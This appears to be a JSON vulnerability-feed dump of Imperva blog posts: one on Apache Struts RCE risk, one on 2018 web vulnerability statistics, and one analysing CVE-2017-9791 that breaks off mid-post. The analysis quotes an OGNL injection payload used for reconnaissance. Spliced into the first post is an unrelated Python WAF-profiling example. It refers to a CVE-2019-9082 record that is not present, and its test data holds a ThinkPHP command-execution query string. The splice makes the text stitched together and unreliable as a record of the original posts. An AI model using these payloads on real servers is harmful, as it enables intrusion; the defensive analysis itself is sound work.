Risk can only be managed.\n\nThe thing that differentiates cyber security from almost any other IT discipline (disaster recovery and business continuity in a post 9/11 world is another) is that with cyber security there is an adversary, and that adversary is motivated and incented to beat you. And if you have something of value to them, and if their reward outweighs their risk, they will continually evolve their tactics to get to it.\n\nBusiness-driven digital transformation is driving exponential growth in the number of knowledge workers, websites, mobile apps, APIs, file servers, databases, etc. Each of these enable our businesses to collect, generate and/or use data to competitive advantage.\n\nIn security parlance, this is known as \u201csurface area\u201d; that which is exposed to an attacker. Each is either an end target of the cybercriminal, or a vector a cybercriminal uses to get to data. The more our businesses digitize, the more surface area there will be. Most of this surface area (the big exception is people themselves) is manifested as technology.\n\n## What\u2019s this got to do with Apache Struts?\n\n[Apache Struts](<http://struts.apache.org/>) \u2013 and you\u2019d have to work hard to find something that initially seems more disconnected from business risk as Apache Struts \u2013 illustrates this.\n\nApache Struts is a framework that extends the Java Servlet API for writing web/mobile/API-based applications. Digital transformation means more apps. More apps mean more use of frameworks like Struts. Which means more technical surface area exposed to attackers. This illustrates why \u201cjust reduce surface area\u201d alone isn\u2019t a strategy. Less surface area means less apps, which would mean less digital transformation itself. Given the perceived cost and revenue-side business benefits of digital transformation, this is not likely to happen.\n\nStruts, and other similar frameworks, basically enable developers to write Java apps faster. 
Struts has been around, in one form or another, since 2000. The current framework \u2013 [Apache Struts 2](<https://en.wikipedia.org/wiki/Apache_Struts_2>) \u2013 was initially released in 2007. Some estimate it is used by 65 percent of the Fortune 500.\n\nOur [research team](<https://www.imperva.com/DefenseCenter>) \u2013 which is the same team that releases our WAF signatures/virtual patches for known vulnerabilities \u2013 collected the following stats on Struts:\n\n * 75 published security vulnerabilities to date\n * 83% of the vulnerabilities can be accessed via a remote attacker (i.e., via network)\n * 75% of the vulnerabilities have working exploits\n * 35% of the vulnerabilities may allow remote code execution (RCE) attacks\n\n### What is RCE?\n\n[RCE](<https://www.imperva.com/blog/2017/01/remote-code-execution-rce-attacks-apache-struts/>) is nasty. IMHO, nastier than the more famous/infamous application vulnerability [SQL injection](<https://www.imperva.com/app-security/threatglossary/sql-injection/>). RCE, or remote code execution, allows an attacker to replace the parameters normally submitted as part of an API call with malicious code. Crafted carefully, this malicious code will then execute on the server. What this malicious code does is up to the attacker. 
Given that web apps frequently access back-end data stores, the potential for an RCE vulnerability to be exploited to breach data is apparent.\n\nIn 2017, there have been four different Apache Struts RCE vulnerabilities:\n\n * CVE-2017-12611\n * [CVE-2017-9805](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>)\n * [CVE-2017-9791](<https://www.imperva.com/blog/2017/07/cve-2017-9791-rce-in-struts-showcase-app-in-struts-1-plugin/>)\n * [CVE-2017-5638](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>)\n\nA close look at these shows several strategies for both reactively and proactively protecting application surface area. These certainly apply to Apache Struts, but also to most application frameworks.\n\n## Ways to Protect Application Surface Area\n\n### Patch Servers\n\nThe long-term fix for a vulnerability is to patch the servers. However, rolling out a patch across thousands of servers running hundreds of different apps owned by tens of different app teams is not a trivial task. It can take months, which is why most servers aren\u2019t at current patch levels.\n\nThere is another bit of nastiness around patching as well. Sometimes patches aren\u2019t backwards compatible. [CVE-2017-9805](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>) contains this: _\u201cIt is possible that some REST actions stop working because of applied default restrictions on available classes.\u201d _In layman\u2019s terms, this means applying the patch can break an existing app. 
This gets to the heart of why security is risk management: deciding to apply a patch prior to testing it with all apps runs the risk of breaking the apps (a.k.a., \u201cpotentially bringing down a website\u201d).\n\n### Virtual Patching\n\nA virtual patch uses a gateway (WAF, IDS, network firewall) that monitors traffic to identify and block an attack before it reaches a web server. _Note, not all types of security gateways can apply a virtual patch to all types of vulnerabilities. _\n\nFor Struts CVE-2017-9805, Imperva used the [ThreatRadar](<https://www.imperva.com/Products/ThreatRadarSubscriptions>) Emergency Feed to distribute a signature and a corresponding virtual patch to SecureSphere Web Application Firewall users within 48 hours of the CVE\u2019s disclosure. Emergency Feed is an opt-in service that leverages the communication channel between SecureSphere and the Imperva cloud to automatically distribute signatures and associated policies to mitigate highly critical vulnerabilities. This in effect automatically deploys a virtual patch for the vulnerability. A policy accomplishing the same thing was uploaded to Incapsula in the same timeframe for Incapsula WAF customers.\n\nVirtual patches for known CVEs are useful, but they are reactive. They are predicated upon knowing about a vulnerability in the first place. There is no (despite what some may say) general signature that spans all RCEs. The following are proactive defenses that can be used to protect against application vulnerabilities (RCE and otherwise).\n\n### Reputation-based Blocking\n\nThe vast majority of attacks launched against web app frameworks are automated. For example, for [CVE-2017-9805](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>), 40% of the attacks tracked by our research team originated from a single server in China. 
There is no reason for any traffic from any source like this to be reaching web servers. Imperva ThreatRadar IP Reputation can be set to fetch the latest IP Reputation feeds several times an hour. While this won\u2019t catch every instance of an attack, it is an excellent filter that will proactively block a large portion of the automated attacks that target web apps.\n\n### Anti-automation\n\nIP reputation isn\u2019t the only mechanism for stopping automated attacks. Both SecureSphere and Incapsula provide functionality for identifying and blocking bots, regardless of the bot\u2019s intent. Both use the same underlying technology to progressively profile a request to determine if the request is a human or a bot, and if a bot a good bot or a bad bot. Identifying and blocking requests from bad bots is another technique for scrubbing automated attacks targeting web apps.\n\n### Web Application Firewall Zero Day Protections\n\nReputation and anti-automation are extremely effective at filtering automated attacks from bad actors, but a careful attacker will be able to mask itself, especially when focusing upon a specific app or enterprise.\n\nHowever, to exploit an RCE vulnerability in every case the attacker needs to send the malicious code \u2013 the \u201cpayload\u201d \u2013 to the app in question. This payload will look wildly different from the typical content (e.g., an API call) submitted to an app. By learning what payloads are normally submitted via various form submissions and API calls, a solid WAF can prevent something like CVE-2017-9805 without knowing the vulnerability exists, and without ever seeing the payload before. 
The SecureSphere WAF uses machine learning to understand how an application normally behaves, and then uses it to identify and block anomalous requests.\n\nImperva zero day protections identified Apache Struts exploits almost immediately via a few different mechanisms:\n\n * Upon learning of a vulnerability, attackers will frequently \u201cspray and pray\u201d an attack against numerous apps, and various forms/APIs within an app. Given automation, it\u2019s more cost-effective for them to just broadly launch an attack than it is to first determine if an app/API is even vulnerable. We saw this for CVE-2017-9805 almost immediately, identifying it as an \u201cunknown content type for known URL\u201d. In English, this translates to \u201cnot only is this not normal, it isn\u2019t even content that this URL can process.\u201d These kinds of alerts are an early \u201ctell\u201d that something is afoot, and our research team uses them both as an early indicator and to inform our ThreatRadar threat intelligence feeds.\n * If the app is susceptible to the vulnerability, a malicious payload will still not conform to normal application traffic. In the case of CVE-2017-9805, SecureSphere will identify an \u201cunknown parameter\u201d or \u201cparameter type violation.\u201d\n * In most cases, the payload is much larger/longer than a normal request. In these cases, a \u201cparameter length violation\u201d will surface.\n\n## The Role of App Security Domain Expertise\n\nWhat only someone who lives and breathes this stuff on a day-in/day-out basis knows is that any one of these violations by itself isn\u2019t necessarily an attack. Policies built on evaluating any of this in isolation can result in a high rate of false positives. False positives are the bane of IT security\u2019s existence, _because when looking at a screen full of alerts, you don\u2019t know which ones are false and which aren\u2019t. 
_The net effect is ignoring them all.\n\nSecureSphere WAF has [patented capabilities](<https://www.imperva.com/Products/AdvancedTechnologies>) that evaluate the relationships between multiple violations. This ability to analyze seemingly independent violations coming from different layers of the app stack (e.g., network protocol, parameter length, IP reputation, etc.) together greatly enhances accuracy. This not only minimizes false positives, but more importantly provides the confidence to actually _block_ requests.\n\n## Manage Business Risk, Protect Against App Exploits\n\nAccording to the [2017 Verizon Data Breach Investigation Report](<http://www.verizonenterprise.com/verizon-insights-lab/dbir/2017/>) more successful breaches resulted from attacks on web apps than any other type of attack. This is telling since web app attacks are only number four in terms of incident frequency.\n\nAttackers realize that web app frameworks like Struts (and all frameworks have security issues) are particularly attractive targets. Since they are used for public facing web apps, they can\u2019t be hidden behind layers of network security. Their role is to accept inputs (web form parameters, API calls, etc.) and then process these inputs, which directly maps to particularly dangerous exploits like SQL injection and RCE. Since frameworks are widely adopted, attackers automate their attacks so they can cost effectively leverage their effort across thousands of websites.\n\nBusiness will roll out more application functionality. The cost savings and revenue generating opportunities from digital transformation pretty much guarantee we\u2019ll have more app surface area next year than this year. 
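The profile violations listed under "Web Application Firewall Zero Day Protections" above, together with the point that one violation in isolation should not block on its own, as an added example in Python that is neither Imperva's code nor vulmap's. It learns a per-URL profile (accepted content types, parameter names, a coarse value type, maximum sizes) from constructed clean traffic, then scores constructed probes against it; one probe mirrors the ThinkPHP query string from the CVE-2019-9082 record earlier on this page, another sends an XML body to an endpoint that has only ever seen JSON. The violation weights, the 1.5x size slack, the block threshold of 4 and the three-level value typing (digit, word, free) are this example's own assumptions, not anything the post specifies.

```python
# Added example, not Imperva's and not vulmap's code: a positive-security profile
# learned per URL and scored with the violation names the post uses. Weights, the
# 1.5x size slack and the block threshold are assumptions; all traffic is constructed.
import re
from dataclasses import dataclass, field

@dataclass
class Request:
    path: str
    content_type: str   # "" when the request carries no body
    params: dict        # query/form parameters, name -> value
    body_len: int = 0

@dataclass
class UrlProfile:
    content_types: set = field(default_factory=set)
    param_types: dict = field(default_factory=dict)    # name -> widest type seen
    param_max_len: dict = field(default_factory=dict)  # name -> longest value seen
    body_max_len: int = 0

TYPE_RANK = {"digit": 0, "word": 1, "free": 2}   # narrowest to widest

def classify(value: str) -> str:
    if re.fullmatch(r"\d+", value):
        return "digit"
    if re.fullmatch(r"[A-Za-z0-9_-]+", value):
        return "word"
    return "free"

def learn(baseline):
    """Build one UrlProfile per path from traffic assumed to be clean."""
    profiles = {}
    for r in baseline:
        p = profiles.setdefault(r.path, UrlProfile())
        p.content_types.add(r.content_type)
        p.body_max_len = max(p.body_max_len, r.body_len)
        for name, value in r.params.items():
            seen = classify(value)
            if name in p.param_types:   # widen, never narrow, the learned type
                seen = max(p.param_types[name], seen, key=TYPE_RANK.__getitem__)
            p.param_types[name] = seen
            p.param_max_len[name] = max(p.param_max_len.get(name, 0), len(value))
    return profiles

def violations(p: UrlProfile, r: Request, slack: float = 1.5):
    """Return [(label, weight)] for everything in r that the profile never saw."""
    found = []
    if r.content_type not in p.content_types:
        found.append(("unknown content type for known URL", 3))
    if r.body_len > p.body_max_len * slack:
        found.append(("request body length violation", 1))
    for name, value in r.params.items():
        if name not in p.param_types:
            found.append((f"unknown parameter: {name}", 2))
            continue
        if TYPE_RANK[classify(value)] > TYPE_RANK[p.param_types[name]]:
            found.append((f"parameter type violation: {name}", 2))
        if len(value) > p.param_max_len[name] * slack:
            found.append((f"parameter length violation: {name}", 1))
    return found

BLOCK_THRESHOLD = 4   # a lone violation only alerts; correlated ones block

def decide(profiles, r: Request):
    """Return ("allow" | "alert" | "block", violations) for one request."""
    p = profiles.get(r.path)
    if p is None:
        return "alert", [("unknown URL", 1)]
    found = violations(p, r)
    if sum(w for _, w in found) >= BLOCK_THRESHOLD:
        return "block", found
    return ("alert" if found else "allow"), found

# Constructed clean traffic: a search form, a JSON API, and a ThinkPHP-style
# front controller whose "s" parameter normally carries module/action paths.
BASELINE = [
    Request("/orders/search", "", {"q": "laptop", "page": "1"}),
    Request("/orders/search", "", {"q": "usb-c-cable", "page": "12"}),
    Request("/api/orders", "application/json", {}, body_len=180),
    Request("/api/orders", "application/json", {}, body_len=240),
    Request("/public/index.php", "", {"s": "index/index/index"}),
    Request("/public/index.php", "", {"s": "index/user/login"}),
]

# Constructed probes: the first mirrors the query string in the CVE-2019-9082
# record above, the second an XML body pushed at a JSON-only endpoint.
CASES = {
    "thinkphp": Request("/public/index.php", "", {
        "s": "index/\\think\\app/invokefunction", "function": "call_user_func_array",
        "vars[0]": "system", "vars[1][]": "id"}),
    "xml_to_json_api": Request("/api/orders", "application/xml", {}, body_len=2600),
    "odd_content_type": Request("/api/orders", "text/plain", {}, body_len=200),
    "long_search": Request("/orders/search", "", {"q": "extraordinarily-long-search-term", "page": "3"}),
    "benign": Request("/orders/search", "", {"q": "monitor", "page": "2"}),
}

def run_demo():
    """Score every probe against the learned profiles: name -> (action, violations)."""
    profiles = learn(BASELINE)
    return {name: decide(profiles, r) for name, r in CASES.items()}
```

Calling run_demo() returns, per probe, an action and the violations behind it. The ThinkPHP probe is blocked because three parameters the profile never saw (function, vars[0], vars[1][]) line up with an over-long routing value, and the XML probe is blocked because the unknown content type coincides with a body far larger than the endpoint normally receives. An unfamiliar content type on its own, or a single search term longer than any seen before, only raises an alert: that is the false-positive trade-off the post describes, and the threshold is where a deployment would tune it.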
Learn more about how to use these capabilities to protect this ever growing surface area with Imperva SecureSphere [Web Application Firewall (WAF)](<https://www.imperva.com/Products/WebApplicationFirewall-WAF>) and [Imperva Incapsula WAF](<https://www.incapsula.com/website-security/web-application-firewall.html>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-09-18T20:33:25", "type": "impervablog", "title": "Apache Struts, RCE and Managing App Risk", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12611", "CVE-2017-5638", "CVE-2017-9791", "CVE-2017-9805"], "modified": "2017-09-18T20:33:25", "id": "IMPERVABLOG:C40BB28F51D206C8BB23721D1ECED353", "href": "https://www.imperva.com/blog/2017/09/apache-struts-rce-and-managing-app-risk/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-27T14:50:26", "description": "\n\n_(**Jan. 12 update: ** Due to a data transfer error, some of the 2017 figures were incorrectly reported; this version of the blog has been corrected. 
This error did not affect our 2018 statistics, nor our conclusions.)_\n\nAs a web application firewall provider, part of our job at Imperva is to continually monitor for new security vulnerabilities. To do this, we use internal software that collects information from various data sources such as vulnerability databases, newsletters, forums, social media and more, integrates it into a single repository, and assesses each vulnerability\u2019s priority. Having this kind of data puts us in a unique position to provide an analysis of all web application vulnerabilities throughout the year, view trends, and notice significant changes in the security landscape. As we did _[last year](<https://www.imperva.com/blog/the-state-of-web-application-vulnerabilities-in-2017/>)_, we took a look back at 2018 to understand the changes and trends in web application security over the past year.\n\nThe bad news is that in 2018, like _[2017](<https://www.imperva.com/blog/the-state-of-web-application-vulnerabilities-in-2017/>)_, we continued to see a **trend of increasing number of web application vulnerabilities**, particularly vulnerabilities related to _[injection](<https://www.owasp.org/index.php/Top_10-2017_A1-Injection>)_ such as _[SQL injection](<https://www.imperva.com/app-security/threatglossary/sql-injection/>)_, command injection, object injection, etc. On the content management system (CMS) front, **WordPress vulnerabilities continue to grow, **and they continue to dominate in terms of the number of vulnerabilities published in the CMS category. Although WordPress leads the pack in sheer vulnerabilities numbers, **Drupal ****vulnerabilities had a larger effect and were used in mass attacks **that targeted hundreds of thousands of sites during 2018. However, there is some good news for the security industry \u2014 the number of **Internet of Things (IoT) vulnerabilities declined**, as well as the number of vulnerabilities related to weak authentication. 
In the server side technologies category, the **number of PHP vulnerabilities continued to decline**. In addition, the **growth in API vulnerabilities also slightly declined**.\n\n## 2018 Web Application Vulnerabilities Statistics\n\nThe first phase in our yearly analysis was to check the amount of vulnerabilities published in 2018 in comparison to previous years. Figure 1 shows the number of vulnerabilities on a monthly basis over the last three years. We can see that the overall number of new vulnerabilities in 2018 (17,308) increased by 23% compared to 2017 (14,082) and by 162% compared to 2016 (6,615). According to our data, more than half of web application vulnerabilities (54%) have a public exploit available to hackers. In addition, more than a third (38%) of web application vulnerabilities don\u2019t have an available solution, such as a software upgrade workaround or software patch.\n\n \n\n \n_Figure 1: Number of web application vulnerabilities in 2016-2018_\n\n## Vulnerabilities by Category\n\nIn Figure 2, you can find 2018 vulnerabilities split into _[OWASP TOP 10 2017](<https://www.imperva.com/app-security/owasp-top-10/>)_ categories.\n\n## Most Common Vulnerability: Injections\n\nThe dominant category this year was by far **injections**, with 19% (3,294) out of the total vulnerabilities of 2018, which is also a 267% increase from last year. When talking about injection vulnerabilities, the first thing that jumps to mind is SQL injections. When drilling down the data, however, we saw remote command execution (RCE) emerge as the bigger issue, with 1,980 vulnerabilities (11.5%), compared to 1,354 vulnerabilities (8%) for SQLi.\n\n_Figure 2: Vulnerabilities into categories 2014-2018_\n\n## No. 
2 Vulnerability \u2014 Cross-Site Scripting\n\nThe number of Cross-site scripting (XSS) vulnerabilities continued to grow and appears to be the second most common vulnerability (14%) among 2018 web application vulnerabilities.\n\n## IoT Vulnerabilities Decreased\n\nIt appears that the number of IoT vulnerabilities has decreased tremendously. Despite the common belief that all our electronic devices can be easily compromised, it appears that something has changed in this area. Possible explanations include: IoT vendors have finally started to implement better security in IoT devices, or that hackers and researchers found another area to focus on in 2018.\n\n \n_Figure 3: IoT vulnerabilities 2014-2018_\n\n## API Vulnerabilities: Growing, but Slowing\n\nAPI (Application Programming Interface) vulnerabilities are becoming more widespread as time goes by. Figure 4 shows the number of API vulnerabilities between 2015-2018. New API vulnerabilities in 2018 (264) increased by 23% over 2017 (214), by 56% compared to 2016 (169), and by 154% compared to 2015 (104).\n\n \n_Figure 4: API vulnerabilities 2015-2018_\n\nAlthough API vulnerabilities continue to grow year-over-year, it appears to be slowing, from 63% between 2015-16 to 27% in 2016-2017 and now 23% between 2017-18. One possible explanation is that since APIs are more popular nowadays, they draw more attention from hackers and security researchers. In turn, organizations spend more time securing their APIs.\n\n## Vulnerabilities in Content Management Systems: Attackers Focused on WordPress\n\nThe most popular content management system is _[WordPress](<https://en.wikipedia.org/wiki/WordPress>)_, used by over 28% of all websites, and by 59% of all websites using a known content management system, according to market share statistics cited by Wikipedia, followed by _[Joomla](<https://en.wikipedia.org/wiki/Joomla>) _and _[Drupal](<https://en.wikipedia.org/wiki/Drupal>)_. 
Perhaps unsurprisingly, WordPress also registered the highest number of vulnerabilities (542) last year, which is a 30% increase from 2017 (Figure 5).\n\n_Figure 5: Number of vulnerabilities by CMS platform 2016-2018_\n\nAccording to the _[WordPress](<https://wordpress.org/plugins/>)_ official site, the current number of plugins is 55,271. This means that only 1,914 (3%) were added in 2018.\n\n_Figure 6: Number of WordPress plugins_\n\nDespite the slowed growth in new plugins, **the number of WordPress vulnerabilities increased.** The explanation for this could either be the code quality of the plugins, or the fact that WordPress is such a popular CMS, which motivates more attackers to develop dedicated attack tools and try their luck searching for holes in the code.\n\nUnsurprisingly, 98% of WordPress vulnerabilities are related to _[plugins](<https://en.wikipedia.org/wiki/WordPress>)_ (see Figure 7 below), which extend the functionality and features of a website or a blog. Anyone can create a plugin and publish it \u2014 WordPress is open source, easy to manage, and there is no enforcement or any proper process that mandates minimum security standards (e.g. code analysis). Hence, WordPress plugins are prone to vulnerabilities.\n\n_Figure 7: WordPress third party vendor vulnerabilities in 2018_\n\nIn Figure 8 below, you can find the ten WordPress plugins with the most vulnerabilities discovered in 2018. Note that these are not necessarily the most-attacked plugins, as the report refers to the number of vulnerabilities seen throughout the year \u2013 and is based upon the continual aggregation of vulnerabilities from different sources. Our annual report is solely based on statistics from this system, and we listed all vulnerabilities that were published during 2018 in general, in WordPress and in WordPress plugins. This indicator solely looks at the number of vulnerabilities. 
There are other measures that are not included in the report - such as \u2018top attacked\u2019 or \u2018riskiest\u2019 - which do not necessarily correlate with this measurement.\n\n_Figure 8: Top 10 vulnerable WordPress plugins in 2018_\n\n## Server Technologies: PHP Vulnerabilities Fell\n\nSince the most popular server-side programming language for websites continues to be PHP, we expect it to have more vulnerabilities than equivalent languages. And that was true. However, as Figure 9 below shows, new vulnerabilities in PHP fell in 2018 versus 2017, just as they did in the prior year. The lack of PHP updates - only one minor update was released, PHP 7.3, in December - could explain why.\n\n_Figure 9: Top server-side technology vulnerabilities 2014-2018_\n\n## The Year of Drupal\n\nAlthough Drupal _[is the third-most](<https://w3techs.com/technologies/overview/content_management/all>)_ popular CMS, two of its vulnerabilities, _[CVE-2018-7600](<https://www.imperva.com/blog/drupalgeddon-2-0-are-hackers-slacking-off/>)_ ('23-mar' bar in Figure 10 below) and _[CVE-2018-7602](<https://www.imperva.com/blog/just-third-critical-drupal-flaw-discovered/>)_ ('25-apr' bar below), also known as _[Drupalgeddon2](<https://www.imperva.com/blog/drupalgeddon-2-0-are-hackers-slacking-off/>)_ and _[Drupalgeddon3](<https://www.imperva.com/blog/just-third-critical-drupal-flaw-discovered/>)_, were the root cause of many security breaches in hundreds of thousands of web servers in 2018. These vulnerabilities allowed an unauthenticated attacker to remotely inject malicious code and run it on default or common Drupal installations. These vulnerabilities allow attackers to connect to backend databases, scan and infect internal networks, mine cryptocurrencies, infect clients with trojans, and more.\n\nThe simplicity of these Drupal vulnerabilities and their catastrophic impact made them a weapon of choice for many attackers. 
In fact, Imperva detected and blocked more than half a million attacks related to these vulnerabilities during 2018. These attacks were also the basis for a few interesting _[blogs](<https://www.incapsula.com/blog/crypto-me0wing-attacks-kitty-cashes-in-on-monero.html>)_ we wrote this year. There was another risky vulnerability, part of the Drupal security patch _[sa-core-2018-006](<https://www.drupal.org/sa-core-2018-006>)_, that was published in October. However, since it was not easy to exploit, the number of attacks was small.\n\n_Figure 10: CVSS Score of Drupal vulnerabilities in 2018_\n\n## Predictions for 2019\n\nAs a security vendor, we\u2019re often asked about our predictions. Here are our vulnerability predictions for 2019:\n\n * PHP announced that versions 5.5, 5.6 and 7.0 reached their _[end of life](<https://secure.php.net/supported-versions.php>)_. That means that these versions will no longer receive security updates. Major CMS like WordPress, Drupal, and Joomla are developed in PHP and require newer versions of PHP. However, they still support older versions. The result is that hackers are now motivated to find new security vulnerabilities in unsupported PHP versions, since those will not be fixed and will impact every application built with these outdated versions. For example, according to _[Shodan](<https://www.shodan.io/search?query=php%2F5>)_ there are currently 34K servers with these unsupported PHP versions.\n * Injection vulnerabilities will continue to grow, mainly because of the economic incentive for attackers (making fast money).\n * More vulnerabilities in APIs will be discovered as DevOps becomes a crucial factor in IT and the usage of and demand for APIs grows.\n\n## How to Protect Your Apps and Data\n\nOne of the best solutions for protecting against web application vulnerabilities is to deploy a web application firewall (WAF). 
A WAF may be either on-premises, in the cloud or _[a combination of both](<https://www.imperva.com/blog/2017/11/cloud-waf-versus-on-premises-waf/>)_ depending on your needs, infrastructure, and more. As organizations are moving more of their apps and data to the cloud, it\u2019s important to think through your security _[requirements](<https://www.imperva.com/blog/2017/06/waf-requirements-and-deployment-options-for-the-cloud/>)_. A solution supported by a dedicated security team is one to add to your selection criteria. Security teams can push timely security updates to a WAF in order to properly defend your assets.\n\n \n\n \n\nThe post [The State of Web Application Vulnerabilities in 2018](<https://www.imperva.com/blog/the-state-of-web-application-vulnerabilities-in-2018/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-01-09T14:00:26", "type": "impervablog", "title": "The State of Web Application Vulnerabilities in 2018", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600", "CVE-2018-7602"], "modified": 
"2019-01-09T14:00:26", "id": "IMPERVABLOG:B21E6C61B26ED07C8D647C57348C4F9E", "href": "https://www.imperva.com/blog/the-state-of-web-application-vulnerabilities-in-2018/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-14T02:18:38", "description": "On July 7th, a new security vulnerability was published in Apache Struts 2 CVE-2017-9791 (S2-048[1]). Struts 2.3.x users with Struts 1 plugin, which includes the Showcase app, are vulnerable.\n\nOnce again, this vulnerability enables a Remote Code Execution (RCE), which is the most commonly exploited Apache Struts vulnerability. In this case, as in many other cases of RCE in Apache Struts, the attacks observed in the wild are also carried in the form of Object-Graph Navigation Language (OGNL) expressions.[2]\n\nLike the recent Struts 2 RCE [CVE-2017-5638](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>), Imperva customers are protected against current variations of the attack using the zero-day attack detection mechanism in either SecureSphere or Incapsula. The zero-day attack detection mechanism protects against malicious traffic regardless of a specific web exploit.\n\n## The Vulnerability\n\nBased on [Apache release notes](<https://cwiki.apache.org/confluence/display/WW/S2-048>), \u201cit is possible to perform a RCE attack with a malicious field value when using the Struts 2 Struts 1 plugin and it's a Struts 1 action and the value is a part of a message presented to the user\u201d. The message presented to the user is processed by the \u201cActionMessage\u201d routine and returned back to the user by the \u201cmessage\u201d function as follows:\n \n \n messages.add(\"msg\", new ActionMessage(**the_message**));\n\nLacking proper validation before execution, the message (the_message) processed by the server may potentially cause a remote code execution. 
To fulfill its execution potential, a remote entry point is required for the message. Following the route of the vulnerable code leads to this location:\n \n \n /struts2-showcase/integration/saveGangster.action\n\nPoking around the webpage reveals several inputs controlled by the user, including name, age, and description (see Figure 1):\n\n\n\n_Figure 1: Vulnerable Apache Struts application_\n\nWhen submitting the \u201cGangster\u201d data the server processes the user\u2019s input with the vulnerable \u201cActionMessage\u201d routine and returns a message to the user (see Figure 2):\n\n\n\n\n\n_Figure 2: Request to the vulnerable page and result_\n\nAs can be observed, the processed message is integrated with the user\u2019s input data (\u201c_Gangster a added\u2026_\u201d) which means now the input data can be modified to include arbitrary code execution (see Figure 3). For instance, the RCE payload can add a custom header to the response message or use an OGNL mechanism to run malicious code (see the second payload in \u201cAttacks in the Wild\u201d section):\n\n\n\n_Figure 3: Exploitation of the vulnerable application_\n\n## Imperva Zero-Day Protection\n\nAs mentioned earlier, Imperva customers are protected against this new Apache Struts vulnerability using zero-day detection mechanisms from either SecureSphere or Incapsula, which detect incoming traffic with malicious content, regardless of a specific vulnerability or exploit.\n\nThe zero-day detection technique prevents the new attack using two complementary deterrence layers:\n\n * First, since the exploit includes an arbitrary remote code to be executed, customers are protected out-of-the-box to most attack variations using a generic Remote Command Execution mitigation mechanism (see Figure 4):\n\n\n\n_Figure 4: SecureSphere blocking a generic RCE_\n\n * Then, in the second layer of defense, SecureSphere and Incapsula both detect potential OGNL expressions which are used to manipulate Java objects, and 
are commonly used by attackers to inject remote code in vulnerable Apache Struts servers, including in this attack (see Figure 5):\n\n__\n\n_Figure 5: SecureSphere blocking a generic OGNL-based RCE_\n\nNevertheless, to be on the safe side, a few hours following the release of this critical vulnerability our security teams published a dedicated mitigation guideline and virtually patched Imperva customers.\n\n## Attacks in the Wild\n\nAn increasing amount of attack attempts have been seen since the publication of this new Struts vulnerability, mostly as hard copy replication of PoCs published shortly after the first announcement, and refer to reconnaissance attempts to track vulnerable servers. Below are details on two common payloads seen in the wild.\n\n### Payload #1: Custom Header Insertion Attempts\n\n**Part of a blocked HTTP request carrying CVE-2017-9791 RCE exploit** \n--- \n**HTTP Method:** | POST \n**POST Body:** | **${#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-BIGSCAN-Test','fe9a40f002fe11e7b4ef0242c0a8050\u2032)}** \n**URL:** | /struts2-showcase/integration/savegangster.action \n \nHTTP headers are easily parsed and extracted with automated scripts, therefore validating the existence of a new custom HTTP header is very straight forward for the attackers to implement and can be used as a reconnaissance request before the actual attack \u2013 i.e., the actual RCE which will take over the server.\n\nIn most cases attackers will use this kind of reconnaissance as part of a vulnerability scanning tool on predefined IPs range, facilitating bots to effectively scan a wide range of addresses. 
